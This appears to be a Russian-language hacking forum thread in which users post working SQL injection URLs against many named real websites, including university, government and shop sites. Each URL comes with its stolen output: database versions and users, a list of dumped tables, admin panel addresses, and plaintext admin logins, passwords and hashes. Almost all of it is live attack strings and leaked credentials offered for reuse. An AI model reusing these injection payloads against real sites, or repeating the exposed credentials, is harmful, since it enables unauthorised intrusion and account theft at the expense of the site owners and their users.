Dimi4, Сдампленные база.таблица: Code: bsa.bsa_pages bsa.products bsa.products_join bsa.program bsa.projects bsa.projects_bak bsa.sp_expt_join bsa.speaker_expertise bsa.speakers bsa.users bsa.users_allowed ccb.UFGS_old ccb.UFGS_old1 ccb.ccb_category ccb.ccb_documents ccb.ccb_library ccb.ccb_org ccb2.UFGS_old ccb2.UFGS_old1 ccb2.ccb_category ccb2.ccb_documents ccb2.ccb_library ccb2.ccb_org cs_training.course cs_training.pages cs_training.users gsa_rat.answers gsa_rat.assessments gsa_rat.project gsa_rat.questions gsa_rat.section gsa_rat.team_members gsa_rat.users mysql.columns_priv mysql.db mysql.func mysql.help_category mysql.help_keyword mysql.help_relation mysql.help_topic mysql.host mysql.proc mysql.procs_priv mysql.tables_priv mysql.time_zone mysql.time_zone_leap_second mysql.time_zone_name mysql.time_zone_transition mysql.time_zone_transition_type mysql.user navfac.active_exams navfac.answers navfac.bookmarks navfac.certificates navfac.cnt_content_blocks navfac.cnt_disciplines navfac.cnt_exercises navfac.cnt_modules navfac.cnt_obj_disciplines navfac.cnt_reading_blocks navfac.cnt_tasks navfac.exams navfac.hibernate_unique_key navfac.questions navfac.report_card_hist navfac.roles navfac.user_answers navfac.user_answers_history navfac.user_info navfac.user_roles ncs.affiliate_sales ncs.affiliates ncs.ballots ncs.ballots_questions ncs.ballots_users ncs.eligible_ballots_users ncs.officer_ballot ncs.questions ncs.task_teams ncs.users ncs.votes ncsforum.usebb_badwords ncsforum.usebb_bans ncsforum.usebb_cats ncsforum.usebb_forums ncsforum.usebb_members ncsforum.usebb_moderators ncsforum.usebb_posts ncsforum.usebb_searches ncsforum.usebb_sessions ncsforum.usebb_stats ncsforum.usebb_subscriptions ncsforum.usebb_topics ncsstore.ds_admin_failed_attempts ncsstore.ds_admin_password_history ncsstore.ds_admins ncsstore.ds_affiliate_payout ncsstore.ds_affiliates ncsstore.ds_blocked_ips ncsstore.ds_cart_files ncsstore.ds_cart_options ncsstore.ds_carts ncsstore.ds_categories ncsstore.ds_category_crumb_trails ncsstore.ds_countries ncsstore.ds_coupon_categories ncsstore.ds_coupon_membership ncsstore.ds_coupon_products ncsstore.ds_coupon_vendors ncsstore.ds_coupons ncsstore.ds_currencies ncsstore.ds_customer_cards ncsstore.ds_customer_reward_points ncsstore.ds_customers ncsstore.ds_download_keys ncsstore.ds_emails ncsstore.ds_gateway_settings ncsstore.ds_gateways ncsstore.ds_gift_certs ncsstore.ds_language_categories ncsstore.ds_language_page_contents ncsstore.ds_language_photos ncsstore.ds_language_product_option_labels ncsstore.ds_language_product_options ncsstore.ds_language_products ncsstore.ds_languages ncsstore.ds_newsletter ncsstore.ds_newsletter_queue ncsstore.ds_option_groups ncsstore.ds_options ncsstore.ds_order_credits ncsstore.ds_order_taxes ncsstore.ds_orders ncsstore.ds_page_contents ncsstore.ds_photos ncsstore.ds_pricing_group ncsstore.ds_pricing_group_categories ncsstore.ds_product_categories ncsstore.ds_product_download_files ncsstore.ds_product_group_pricing ncsstore.ds_product_pricing ncsstore.ds_product_reviews ncsstore.ds_product_timelines ncsstore.ds_products ncsstore.ds_products_cross_sell ncsstore.ds_protx ncsstore.ds_registries ncsstore.ds_registry_items ncsstore.ds_search_groups ncsstore.ds_searches ncsstore.ds_settings ncsstore.ds_shipping ncsstore.ds_simplified_columns ncsstore.ds_state_taxes ncsstore.ds_states ncsstore.ds_subscription_carts ncsstore.ds_subscription_countries ncsstore.ds_subscription_orders ncsstore.ds_subscription_timelines ncsstore.ds_tax ncsstore.ds_tax_rates ncsstore.ds_text ncsstore.ds_tmp_tracking ncsstore.ds_top_sellers ncsstore.ds_vendors ncsstore.ds_widgets ncsstore.ds_wishlists ncsstore.se_keyword_values ncsstore.se_keywords ncsstore.se_session urchin.uaccounts urchin.uaccounts_permissions urchin.ufilters urchin.ufilters_permissions urchin.ugeo_tasks urchin.ugeo_tasks_permissions urchin.uglobals urchin.uglobals_permissions urchin.ugoals urchin.ugoals_permissions urchin.ugroups urchin.ugroups_permissions urchin.ugroups_uusers urchin.ugroups_uusers_permissions urchin.ulogs urchin.ulogs_permissions urchin.ulogs_ufilters urchin.ulogs_ufilters_permissions urchin.uprofiles urchin.uprofiles_permissions urchin.uprofiles_queue urchin.uprofiles_queue_permissions urchin.uprofiles_tasks urchin.uprofiles_tasks_permissions urchin.uprofiles_ufilters urchin.uprofiles_ufilters_permissions urchin.uprofiles_ugroups urchin.uprofiles_ugroups_permissions urchin.uprofiles_ulogs urchin.uprofiles_ulogs_permissions urchin.uprofiles_uusers urchin.uprofiles_uusers_permissions urchin.usessions urchin.usessions_permissions urchin.uusers urchin.uusers_permissions wbdg.agencies wbdg.caac wbdg.caac_docs wbdg.caac_docs_comments wbdg.calendar wbdg.ccbcategories wbdg.ce_testinfo wbdg.ce_tests wbdg.ce_users wbdg.countries wbdg.cwm_options wbdg.cwm_recordOptions wbdg.cwm_records wbdg.cwm_users wbdg.documents wbdg.dodihs wbdg.epa_greenguide wbdg.epa_greenspec wbdg.events wbdg.leed wbdg.mandates wbdg.masterformat wbdg.mf_div wbdg.organizations wbdg.relations wbdg.spie wbdg.states wbdg.tools wbdg.tools_categories wbdg.wbdg_pages wbdg.zipData 4.1.22-standard:ic_music:ic@localhost
Code: http://www.cactuslove.ru/su_big_foto.php?imgid=350'/**/union/**/select/**/1,2,concat_ws(0x3a,login,password,nick),4,5/**/from/**/cactuslove/**/limit/**/1,1/* Яндекс тИЦ: 1400 Database: cactuslove Version: 5.0.32-Debian_7etch8-log User: cactus_user@localhost
http://www.hasznaltautokereskedok.hu/see.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(char(32,45,32),version(),user(),database()),24,25,26,27,28,29,30,31,32,33-- 5.0.32-Debian_7etch5-log - root@localhost - hauto pr- 3 --------------------------- http://www.avaria-auto.ru/see.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 4.1.22-standard-log - avariaau_auto@localhost - avariaau_autolen pr - 3
ChaaK, Dimi4, в продолжение: Code: http://www.wbdg.org/ccb/browse_cat.php?o=29&c=-4+union+select+concat_ws(user,0x3a,password),2+from+mysql.user+where+user='root'-- root:*347372949FBE1B252E308137EA426D7307712EC8 ChaaK, почему-то тогда не искалось оО, а сейчас есть
http://www.mojo-jojo.lv Code: http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+version()-- 5.0.67-log lv_users: Code: http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+table_name+from+information_schema.tables+limit+37,1-- user_login:user_pass: Code: http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+concat_ws(user_login,0x3a,user_pass)+from+lv_users-- admin:817c2f281b767ae9ac524c596a0ee645
svpressa.ru - интернет издание 5.0.51a-log:svpressa@localhost:svpressa Логин и Пасс админа: em:vue Вход в админку: svpressa.ru/adm/
1.эту скуль я уже вылаживал.. 2.правда без админки..выложи это лучше в доступах..а не тут..(смотри пунк 1) -------------------------- http://www.hiddenmickeysguide.com/catalog.php?id=-1+union+select+concat_ws(char(32,45,32),id,name,email,bio,img,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users-- -------------------- http://www.yusk.ru/cat.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7-- 5.0.30-Debian_1-log - [email protected] - z71348_main ТИЦ : 80 PR: 3 ----------------------- http://www.mkc-kc.ru/shop/cat.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database())-- 4.1.22-log - mksks@localhost - wwwmksksru ТИЦ : 80 PR: 4 ------------------------- http://www.monolithstroi.ru/cat.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3-- 5.0.67-percona-b5-log - rkot@localhost - rkot ---------------------- http://www.nzn-msk.ru/cat.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7,8,9,10-- 4.0.24 - akrs1@localhost - db_akrs ТИЦ : 40 PR: 2 ---------------- http://www.antey87.ru/cat.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11-- 4.1.20-lk-log - orionaru_aveo@localhost - orionaru_aveo ТИЦ : 10 PR: 4 ------------------------- http://www.x-telpro.ru/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2-- 4.0.27 - root@localhost - xtelpro_xtelprodb ТИЦ : 60 PR: 4 ------------------- http://www.maginfo.com.ua/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database())-- 5.0.51a-log - [email protected] - ukrfoto_db ТИЦ : 30 PR: 3 http://www.maginfo.com.ua/cat.php?id=-1+union+select+unhex(hex(group_concat(column_name)))+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273-- id,user_name,user_password http://www.maginfo.com.ua/cat.php?id=-1+union+select+concat(id,0x3a,user_name,0x3a,user_password)+from+administrators-- а здесь чо то не выводит( наверное потому что нету этих значений..т.к. там при заходе в админку не чз сайт а чз хостинг( --------------------- http://www.arka-hitech.com.ua/cat.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 4.1.22 - arka-hitech@localhost - arka_hitech ТИЦ : 20 PR: 3 ----------------- http://foto.pokupaem.com.ua/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2-- 5.0.51a-log - [email protected] - ukrfoto_db PR: 1 -------------- http://www.riak.lg.ua/pagegen.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4-- 5.1.15-beta-log - linksuser@localhost - links ТИЦ : 70 PR: 4 ---------------- http://www.dominican.edu/query/ncur/display_ncur.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(char(32,45,32),version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118-- 5.0.26-LOG - DUOC_ONLINE@NACIO1 - DOMINICAN ТИЦ : 70 PR: 6 ---------------------- http://webscript.princeton.edu/~paw/memorials/memdisplay.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7,8,9-- 4.1.12-log - paw@localhost - paw ТИЦ : 60 ---------------------- http://www.inst.msstate.edu/print_page.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9-- 4.1.22-log - inst_site@localhost - inst_frontend PR: 5 ------------------- http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7,8,9,10,11-- 4.1.22-standard-log - opednews_vidya@localhost - opednews_pearl ТИЦ : 220 PR: 6 ------------------ http://www.faoswalim.org/resource_center/geonetwork/link.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 4.1.22-standard - faoswa_new@localhost - faoswa_new PR: 5 -------------
http://www.villaclick.com/search/availabilitymail.asp?ID=-1+union+select+top+1+username%2bchar(0x7e)%2bpassword,222,333+from+Operators-- http://www.villaclick.com/admin/
www.peoples.ru - крупное интернет издание Version: 5.0.45-log USER: [email protected] Database: peoplesru
https://secure1.ilisys.com.au/great/order.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6-- 4.1.21-standard-log - [email protected] - great_db ------------------ http://www.navimeteo.eu/order.php?ID=-1+union+select+1,concat_ws(char(32,45,32),Username,Password,testoMail,refMail,mail2,contratto,contratto_eng,contratto_ita,allegato_eng,allegato_ita,brochure_ita,brochure_eng,last_access,last_ip),3,4,5,6+from+nav_settings-- http://www.navimeteo.eu/admin nav0609:rfz278hj ------------------------- http://www.artworksisrael.com/order.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32),version(),user(),database()),7,8,9,10,11,12,13,14,15-- 5.0.32-Debian_7etch8-log - aistore@localhost - aistore ---------------- http://zhdkrecords.zhdk.ch/order.php?ID=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6-- 5.0.32-Debian_7etch6-log - hmtzrecords@localhost - hmtzrecords ------------------- http://dtv.horizont.by/index.php?id=news&n=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5-- 4.1.22-standard - dtvhori_user@localhost - dtvhori_dtvdb ----------------------- http://siovizcenter.ucsd.edu/library/objects/detail.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 4.1.22-log - viz_php@localhost - sioviz PR: 6 --------------- http://www.lrdc.pitt.edu/people/person-detail.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2,3,4-- 4.1.22-log - [email protected] - lrdc-site ТИЦ : 10 PR: 6 ----------------------- http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32,45,32),user_id,user_name,user_login,user_password,user_level))),6,7+from+users+limit+0,1-- http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32,45,32),user_id,user_name,user_login,user_password,user_level))),6,7+from+users+limit+1,1-- http://www.magindustries.com/admin http://www.magindustries.com/cpanel к админкам не конектит( http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7-- 5.0.67-community - magind_dbguy@localhost - magind_main -------------------- http://www.nwce.gov.uk/view_event.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 4.1.22-standard-log - nwce@localhost - nwce -------------------- http://www.bbaa.org.uk/index.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database())-- 5.0.67-log - bbaa@localhost - bbaa PR - 6 ------------------------ http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13-- 4.0.27-standard-log - [email protected] - db120565932 ТИЦ - 30 ------------------ http://www.norwichplayhouse.org.uk/viewshowdetail.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15-- 4.0.23-standard - norwichp@localhost - norwichp_play PR - 5 ----------------- http://www.worksmart.org.uk/jargonbuster/index.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2-- 4.1.20 - worksmart@localhost - tuc ТИЦ : 70 PR: 6 ---------------- http://www.monitor-nhsft.gov.uk/publications.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(%20),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 5.0.54 - monitor@localhost - nhsftreg ТИЦ : 10 PR: 5 ---------------- http://old.cs.ncl.ac.uk/people/home.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 5.0.45 - csReader@localhost - CompSci PR: 4 --------------------------- http://www.gower-boat-trips.co.uk/home.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,45,32),version(),user(),database()),10,11,12-- 4.1.22-STANDARD - GOWER_ADVENTURER@LOCALHOST - GOWER_COAST --------------------
http://www.ansti.org/order.php?id=-1+union+select+1,2-- 4.1.22-standard ansti@localhost ansti_anstiorg
http://www.genetics.wisc.edu/faculty/profile.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database())-- 5.0.26-log — [email protected] — registry ТИЦ : 40 PR: 7 ----------------- http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 4.0.20-debug-debug - smit ТИЦ : 50 PR: 5 -------------------
http://goodbux.buxhost.ru/login.php?' Есть ли тут инъекция, если да то как можно её раскрутить :::::::::: есть таблицы :::::::::::: * tb_ads * tb_ads_categories * tb_advertisers * tb_buyref * tb_cheaters * tb_checkfaq * tb_clickpack * tb_config * tb_contact * tb_history * tb_messenger * tb_payme * tb_refset * tb_site * tb_upgrade * tb_users * users_online
DE Shop'ы www.salesafter.de 4.0.27-max-log::db103929080 ______________________________ www.schuetzenbund.de admin::sh00ting 5.0.32-Debian_7etch8-log
http://www.chiapas.gob.mx/funcionarios/listado-servidores-entidad.php?id=-1+union+select+concat_ws(0x3a3a,usuario,password,database()),2,3,4,5,6,7,8,9,10,11,12+from+usuarios+limit+0,1/* login: jlmorales pass: mo222530 http://www.chiapas.gob.mx/admin/ ПОХЕК )))
http://www.aupe.org/in_the_news/news.php?id=-1+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin-- KJa6hDJQyb логина не нашёл 4.0.18
http://www.bastion-vlg.ru/ask/?id=1+union+select+1,2,3,4,5,6,7,8,version()+--+ PS В следующий раз вопросы в соседней ветке, пожалуйста
